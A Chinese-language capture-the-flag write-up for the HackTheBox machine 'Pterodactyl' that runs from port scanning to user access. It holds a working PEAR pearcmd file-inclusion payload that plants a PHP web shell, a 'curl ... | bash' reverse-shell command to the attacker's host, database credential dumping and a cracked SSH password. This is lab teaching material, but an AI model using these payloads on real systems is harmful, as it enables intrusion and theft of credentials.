HTB 赛季10 - Pterodactyl - user

复制代码
10.129.16.212

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260208171012.png]]

http://pterodactyl.htb/changelog.txt

![[Pasted image 20260208171809.png]]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

复制代码
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

![[Pasted image 20260208172226.png]]

![[Pasted image 20260208172440.png]]

我们了解到这个漏洞存在,经过大量尝试,我们发现该漏洞是一种php文件包含的变种,他包含了pearcmd后,导致了RCE。我的payload如下

复制代码
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

![[Pasted image 20260208183251.png]]

复制代码
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

![[Pasted image 20260208183309.png]]

我们开始反连

复制代码
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php 

![[Pasted image 20260208183354.png]]

复制代码
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

![[Pasted image 20260208183543.png]]

![[Pasted image 20260208183627.png]]

上linpeas

复制代码
wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

![[Pasted image 20260208184031.png]]

喷洒密码,没有用

复制代码
PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

![[Pasted image 20260208190605.png]]

![[Pasted image 20260208191849.png]]

复制代码
ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

![[Pasted image 20260208191631.png]]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞,但是我始终没能根据描述完成攻击。

相关推荐
一只小白00014 分钟前
一篇讲清TCP的三次握手&四次挥手
服务器·网络·tcp/ip
tang7778923 分钟前
2026年国内代理IP服务商横向测评:企业级爬虫如何选型?
运维·服务器·网络·爬虫·python·代理
上海云盾-小余23 分钟前
网站木马植入原理与彻底清除、长效防御方案
网络·网络协议·tcp/ip·系统安全
Be reborn34 分钟前
用 Playwright 做自动化测试:如何验证网络请求并做断言
网络·python·自动化·pytest
VOOHU-沃虎1 小时前
工业以太网接口的隐形门槛:网络变压器选型失当的故障分析与系统性验证
网络
星幻元宇VR1 小时前
VR大空间:沉浸式数字体验引领新时代科普与教育升级
科技·学习·安全·vr·虚拟现实
广州灵眸科技有限公司1 小时前
瑞芯微(EASY EAI)RV1126B yolov11-track多目标跟踪部署教程
linux·开发语言·网络·人工智能·yolo·机器学习·目标跟踪
牵牛老人1 小时前
CAN通讯实战:Qt基于周立功 USBCAN 的 CAN 总线通信开发全攻略
网络·qt·系统架构
xiaoxiaoxiaolll1 小时前
《Nature Communications》论文解读:皮秒级单光子偏振测量如何绘制多模光纤中的模态动态图谱
网络·人工智能
Inhand陈工1 小时前
城投公司地面与停车场监控改造实战:映翰通IR302 + GRE隧道实现RFID与视频数据远程汇聚
网络·人工智能·物联网·网络安全·智能路由器·信息与通信